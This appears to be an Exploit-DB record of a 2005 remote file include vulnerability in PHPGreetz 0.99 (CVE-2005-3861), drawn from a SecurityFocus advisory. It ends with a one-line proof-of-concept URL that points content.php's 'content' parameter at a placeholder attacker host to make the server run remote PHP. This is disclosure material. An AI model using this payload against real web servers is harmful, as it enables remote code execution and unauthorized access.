PHPGreetz 0.99 - Remote File Include Vulnerability

2005-11-26T00:00:00
ID EDB-ID:26599
Type exploitdb
Reporter [GB]
Modified 2005-11-26T00:00:00

Description

PHPGreetz 0.99 Remote File Include Vulnerability. CVE-2005-3861. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/15575/info

phpGreetz is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. 

http://www.example.com/path_to_phpgreetz/content.php?content=http://[attacker_url]